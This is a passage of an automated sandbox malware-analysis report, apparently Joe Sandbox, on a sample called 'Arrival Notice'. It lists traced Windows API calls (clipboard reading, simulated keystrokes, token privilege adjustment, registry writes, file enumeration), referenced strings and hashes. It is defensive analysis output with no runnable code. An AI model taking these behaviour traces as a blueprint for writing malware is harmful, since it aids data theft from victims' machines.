                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: ce350de4b08df158806ebca8a92aaed3a96e93d6cfab4538b195c443e53b488a
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: B9B092B684020C77DE012E96EC02A693F19AB50678F808020FB0C18162A673A6A0968E
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 0093D46A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 5f2075110a62a938173e3e631d2c7b9205fedaabfbb14c4c799d37d576449e53
                                              • Instruction ID: 5b3945334d72eadb17cd4eb6a485290bc309fc81139bfb766abc85b69a915f50
                                              • Opcode Fuzzy Hash: 5f2075110a62a938173e3e631d2c7b9205fedaabfbb14c4c799d37d576449e53
                                              • Instruction Fuzzy Hash: 1F713E342057029FC714EF28D4A1A6AB7E4FF88314F044A6EF5969B3A2DB30A945CF52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: 5562889b37bb5d786943582350b0b92e021a60243e2d7d11876119b5f1fb0ea0
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: D031D370A00109DFC718DF68D480969F7A6FF59300B648AA5E50ACB752DB31EDC1CF90
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 014C22B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction ID: e462c82f5e774763a9338a5949e728ccfff39d87310478621136daff319d7521
                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                              • Instruction Fuzzy Hash: 83E0BF7494020EEFDB00EFA8D6496EE7BB4EF04711F1005A5FD05D7691DB709E548A62
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 014C22B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: 749255ce209797948ae027d2e94c0d992cfa5ebd2acb84ef18c3932a6352e1d7
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 3AE0E67494020EDFDB00EFB8D6496AE7FB4EF04701F100165FD01D2281D6709D508A72
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0095CE50
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095CE91
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0095CED6
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095CF00
                                              • SendMessageW.USER32 ref: 0095CF29
                                              • _wcsncpy.LIBCMT ref: 0095CFA1
                                              • GetKeyState.USER32(00000011), ref: 0095CFC2
                                              • GetKeyState.USER32(00000009), ref: 0095CFCF
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095CFE5
                                              • GetKeyState.USER32(00000010), ref: 0095CFEF
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095D018
                                              • SendMessageW.USER32 ref: 0095D03F
                                              • SendMessageW.USER32(?,00001030,?,0095B602), ref: 0095D145
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0095D15B
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0095D16E
                                              • SetCapture.USER32(?), ref: 0095D177
                                              • ClientToScreen.USER32(?,?), ref: 0095D1DC
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0095D1E9
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0095D203
                                              • ReleaseCapture.USER32 ref: 0095D20E
                                              • GetCursorPos.USER32(?), ref: 0095D248
                                              • ScreenToClient.USER32(?,?), ref: 0095D255
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095D2B1
                                              • SendMessageW.USER32 ref: 0095D2DF
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095D31C
                                              • SendMessageW.USER32 ref: 0095D34B
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0095D36C
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0095D37B
                                              • GetCursorPos.USER32(?), ref: 0095D39B
                                              • ScreenToClient.USER32(?,?), ref: 0095D3A8
                                              • GetParent.USER32(?), ref: 0095D3C8
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095D431
                                              • SendMessageW.USER32 ref: 0095D462
                                              • ClientToScreen.USER32(?,?), ref: 0095D4C0
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0095D4F0
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095D51A
                                              • SendMessageW.USER32 ref: 0095D53D
                                              • ClientToScreen.USER32(?,?), ref: 0095D58F
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0095D5C3
                                                • Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0095D65F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$F
                                              • API String ID: 3977979337-4164748364
                                              • Opcode ID: c4315db96fec00fcaaff03092e7ce02be2d2474ddc0092629eb58ff2f435ac5a
                                              • Instruction ID: 14ad9e8bb95413fdb2e7fe6fdb4d6547eb3d5d5a53180e7b8681b2b64318d71f
                                              • Opcode Fuzzy Hash: c4315db96fec00fcaaff03092e7ce02be2d2474ddc0092629eb58ff2f435ac5a
                                              • Instruction Fuzzy Hash: 7C42AF70109341AFDB25CF2AC894F6ABBF9FF48315F140519FA59872A0D7319C49DB92
                                              APIs
                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0095873F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: %d/%02d/%02d
                                              • API String ID: 3850602802-328681919
                                              • Opcode ID: f76f0c6177d480094c1f2013240049c9e8623d20a22005782a52cf29d1e915d0
                                              • Instruction ID: 9eceaec5d12b85b48e4c8db9967502e9deac5b9073dbe3377b730c366b02f583
                                              • Opcode Fuzzy Hash: f76f0c6177d480094c1f2013240049c9e8623d20a22005782a52cf29d1e915d0
                                              • Instruction Fuzzy Hash: 8412CF71505208ABEB258F2ACC49FAF7BF8EF49312F204569F915EA2E1DF748945CB10
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove$_memset
                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                              • API String ID: 1357608183-1798697756
                                              • Opcode ID: f6554a290bb8575d8b195b770100ee5a0cd1f01c0f7725cecfe0dad9e1f94ba3
                                              • Instruction ID: d5a8845000bca7a29d9af94cdfd51b919674355986c0dd01440d0a3f7340e1c5
                                              • Opcode Fuzzy Hash: f6554a290bb8575d8b195b770100ee5a0cd1f01c0f7725cecfe0dad9e1f94ba3
                                              • Instruction Fuzzy Hash: 6F93C271A0422ADFDB24CF58D881BADB7B5FF48314F24856AE945EB384E7749E81CB40
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 008D4A3D
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0090DA8E
                                              • IsIconic.USER32(?), ref: 0090DA97
                                              • ShowWindow.USER32(?,00000009), ref: 0090DAA4
                                              • SetForegroundWindow.USER32(?), ref: 0090DAAE
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0090DAC4
                                              • GetCurrentThreadId.KERNEL32 ref: 0090DACB
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0090DAD7
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0090DAE8
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0090DAF0
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0090DAF8
                                              • SetForegroundWindow.USER32(?), ref: 0090DAFB
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB10
                                              • keybd_event.USER32(00000012,00000000), ref: 0090DB1B
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB25
                                              • keybd_event.USER32(00000012,00000000), ref: 0090DB2A
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB33
                                              • keybd_event.USER32(00000012,00000000), ref: 0090DB38
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB42
                                              • keybd_event.USER32(00000012,00000000), ref: 0090DB47
                                              • SetForegroundWindow.USER32(?), ref: 0090DB4A
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0090DB71
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: 20563ab8fd90f577c7f8c4934b3983dd1b117adb0be92c19828e5821e180e4c2
                                              • Instruction ID: 058aacbc49254b55261a0fce2e3f0087a32eeba7b1af0a5239b03d38fb2151a9
                                              • Opcode Fuzzy Hash: 20563ab8fd90f577c7f8c4934b3983dd1b117adb0be92c19828e5821e180e4c2
                                              • Instruction Fuzzy Hash: 20317071A95318BFEB206FA29C49F7F3E6CEB44B61F114025FA04EB1D0D6B05901BBA0
                                              APIs
                                                • Part of subcall function 00928CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
                                                • Part of subcall function 00928CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
                                                • Part of subcall function 00928CC3: GetLastError.KERNEL32 ref: 00928D47
                                              • _memset.LIBCMT ref: 0092889B
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009288ED
                                              • CloseHandle.KERNEL32(?), ref: 009288FE
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00928915
                                              • GetProcessWindowStation.USER32 ref: 0092892E
                                              • SetProcessWindowStation.USER32(00000000), ref: 00928938
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00928952
                                                • Part of subcall function 00928713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00928851), ref: 00928728
                                                • Part of subcall function 00928713: CloseHandle.KERNEL32(?,?,00928851), ref: 0092873A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: 9c529aeeb3e6ef104745979b886fdd76ea2a618e6423c1e2d118b7370c8f3d6c
                                              • Instruction ID: 30198a170f9f04b1e56faf590e2e80e4fd6626464fd7947de5b2560af74187cf
                                              • Opcode Fuzzy Hash: 9c529aeeb3e6ef104745979b886fdd76ea2a618e6423c1e2d118b7370c8f3d6c
                                              • Instruction Fuzzy Hash: 3B814871902219AFDF11DFA4EC45AAFBBBCEF04315F08416AF910A6265DF318A159B60
                                              APIs
                                              • OpenClipboard.USER32(0095F910), ref: 00944284
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00944292
                                              • GetClipboardData.USER32(0000000D), ref: 0094429A
                                              • CloseClipboard.USER32 ref: 009442A6
                                              • GlobalLock.KERNEL32(00000000), ref: 009442C2
                                              • CloseClipboard.USER32 ref: 009442CC
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 009442E1
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 009442EE
                                              • GetClipboardData.USER32(00000001), ref: 009442F6
                                              • GlobalLock.KERNEL32(00000000), ref: 00944303
                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00944337
                                              • CloseClipboard.USER32 ref: 00944447
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                              • String ID:
                                              • API String ID: 3222323430-0
                                              • Opcode ID: 980377ac79ec7a7398a760a84479f496b9a48b8041dcb8b880b5417f59e1916b
                                              • Instruction ID: 829164c59e7cfe094d2954b983b4e0a0d346dde53b4c0441dd33680d737f2e96
                                              • Opcode Fuzzy Hash: 980377ac79ec7a7398a760a84479f496b9a48b8041dcb8b880b5417f59e1916b
                                              • Instruction Fuzzy Hash: 6751A171208306ABD310EF65ECA5F7F77A8BF84B11F00462AF556D22A1DF70D9049B62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0093C9F8
                                              • FindClose.KERNEL32(00000000), ref: 0093CA4C
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093CA71
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093CA88
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CAAF
                                              • __swprintf.LIBCMT ref: 0093CAFB
                                              • __swprintf.LIBCMT ref: 0093CB3E
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                              • __swprintf.LIBCMT ref: 0093CB92
                                                • Part of subcall function 008F38D8: __woutput_l.LIBCMT ref: 008F3931
                                              • __swprintf.LIBCMT ref: 0093CBE0
                                                • Part of subcall function 008F38D8: __flsbuf.LIBCMT ref: 008F3953
                                                • Part of subcall function 008F38D8: __flsbuf.LIBCMT ref: 008F396B
                                              • __swprintf.LIBCMT ref: 0093CC2F
                                              • __swprintf.LIBCMT ref: 0093CC7E
                                              • __swprintf.LIBCMT ref: 0093CCCD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: c9903bcd93424a867fc5090ede8d5755021237eaddaf09ed2d6bcc1c1527408b
                                              • Instruction ID: c27a90bfcd4eb9ed5b1aad85bb3a3ab8013bec405cd186e925982f48921c3122
                                              • Opcode Fuzzy Hash: c9903bcd93424a867fc5090ede8d5755021237eaddaf09ed2d6bcc1c1527408b
                                              • Instruction Fuzzy Hash: FBA142B2418315ABC710EB68C895DAFB7ECFF94704F404A2AF595D3291EA34DA04CB63
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0093F221
                                              • _wcscmp.LIBCMT ref: 0093F236
                                              • _wcscmp.LIBCMT ref: 0093F24D
                                              • GetFileAttributesW.KERNEL32(?), ref: 0093F25F
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0093F279
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0093F291
                                              • FindClose.KERNEL32(00000000), ref: 0093F29C
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0093F2B8
                                              • _wcscmp.LIBCMT ref: 0093F2DF
                                              • _wcscmp.LIBCMT ref: 0093F2F6
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0093F308
                                              • SetCurrentDirectoryW.KERNEL32(0098A5A0), ref: 0093F326
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0093F330
                                              • FindClose.KERNEL32(00000000), ref: 0093F33D
                                              • FindClose.KERNEL32(00000000), ref: 0093F34F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: 191efdcdd44f7733e4b614890f414a32674627a5e12d8e965e3dc036aef34923
                                              • Instruction ID: 8461ac7b01615347816d8a0bad5181ef4e943ad64c89d5c39bcf4630e598e0c9
                                              • Opcode Fuzzy Hash: 191efdcdd44f7733e4b614890f414a32674627a5e12d8e965e3dc036aef34923
                                              • Instruction Fuzzy Hash: E531B276900219AADF10EBB5DC68AEF73ACAF483A1F100176F914D31A0EB34DA45DF50
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950BDE
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0095F910,00000000,?,00000000,?,?), ref: 00950C4C
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00950C94
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00950D1D
                                              • RegCloseKey.ADVAPI32(?), ref: 0095103D
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0095104A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: c9fe3a2aa4300b17687cf7e571d900618982f4247707adbce652f9c8ba8a54af
                                              • Instruction ID: c43a452364a1ae5850e93eb7970d03fc380388dbb9e86c63359b3199ee5d9862
                                              • Opcode Fuzzy Hash: c9fe3a2aa4300b17687cf7e571d900618982f4247707adbce652f9c8ba8a54af
                                              • Instruction Fuzzy Hash: 50025F75204611AFCB14EF29C895E2AB7E5FF89714F04895DF9899B3A2CB30EC44CB42
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0093F37E
                                              • _wcscmp.LIBCMT ref: 0093F393
                                              • _wcscmp.LIBCMT ref: 0093F3AA
                                                • Part of subcall function 009345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009345DC
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0093F3D9
                                              • FindClose.KERNEL32(00000000), ref: 0093F3E4
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0093F400
                                              • _wcscmp.LIBCMT ref: 0093F427
                                              • _wcscmp.LIBCMT ref: 0093F43E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0093F450
                                              • SetCurrentDirectoryW.KERNEL32(0098A5A0), ref: 0093F46E
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0093F478
                                              • FindClose.KERNEL32(00000000), ref: 0093F485
                                              • FindClose.KERNEL32(00000000), ref: 0093F497
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
